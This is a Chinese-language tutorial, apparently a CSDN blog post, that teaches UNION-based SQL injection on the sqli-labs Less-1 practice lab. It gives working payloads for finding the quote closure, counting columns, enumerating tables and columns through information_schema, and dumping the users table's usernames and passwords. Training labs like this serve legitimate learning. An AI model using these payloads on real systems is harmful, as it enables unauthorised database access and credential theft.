目录
环境:本地搭建的sql-labs和phpMyAdmin
上一篇文章中我们归纳了sql注入的基本顺序:
(1)查找注入点
(2)判断是字符型注入还是数字型注入 and 1=1 1=2/ 3-1
(3)如果是字符型,要找到他的闭合方式 ' " ') ")
(4)查询列数,group by order by
(5)查询回显位置,将id改为0或者-1
拿sql-labs less-1举例:
1、查找注入点,点击进去就看到了注入点的提示,即id
2、判断注入类型,这里尝试用减法判断
?id=2-1
发现返回的是id=2的结果,说明是字符型注入
3、判断闭合方式
这里有一个简单的方法,即用\(转义字符)来判断,当闭合字符遇到转义字符时,会被转义,那么没有闭合的语句就不完整,就会报错。
分析报错信息:看\后面跟着的字符,是什么字符,它的闭合字符就是什么
?id=1\
闭合符为'(单引号)
4、查询列数
使用二分法逐步排查,当group by 3有正确回显,而group by 4没有正确回显,说明列数为三列
?id=1' group by 3 --+
5、查询回显位
使用union select 查询,1,2,3表示的是三列的意思,也可以用其他数字来代替,只要是三个数字代表三列就行
?id=1' union select 1,2,3 --+
但是发现回显的内容并没有改变
利用phpMyAdmin查询数据库可以发现,id=1的内容有两列,但是我们回显的内容只有一列,于是便会回显id=1的第一列的内容
select * from users where id=1 union select 1,2,3;
于是我们将id改为一个不存在的值,就可以将我们输入的内容回显了
?id=-1' union select 1,2,3 --+
可以看到显示位为2和3
拿到表名和列名:
表名集合表:tables
列名集合表:columns
所需要的表名信息:数据库information_schema——>数据表tables——>数据列table_name
查找列:
?id=-1' union select 1,2,table_name from information_schema.tables --+
可以看到有一个返回值
但这只是一个列的名字,我们知道一个库中是有许许多多列的,于是我们进一步细化,table_schema表示的是数据库,database() 是一个函数,返回的是当前数据库的名字。即将查找的范围缩小到了,当前的数据库。
?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=database() --+
发现回显只有一行,于是我们又要用到之前介绍的group_concat()函数,将输出变为一行,将要输出的参数放在group_concat()函数括号内https://mp.csdn.net/mp_blog/creation/editor/140436757https://mp.csdn.net/mp_blog/creation/editor/140436757
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
返回该库中所有表的名字
拿到了表名,接下来我们要拿到列名:
类似于上面的步骤,将表名table_name换为column_name查询,可以得到所有的列名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns --+
继续细化筛选条件:
table_schema=database()表示在当前数据库中查询
table_name='users' 表示在当前表即users中查询列
如下图所示,得到了三个列:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
接下来去拿列中的具体信息:
从users表中拿username,和password
?id=-1' union select 1,2,group_concat(username,password) from users --+
成功拿到信息,这里可以加一个分隔符便于查看
?id=-1' union select 1,2,group_concat(username,"~",password) from users --+
今天就写到这里啦!
喜欢的话给我点个赞吧,我们一起成长!!!
来源:橙子科技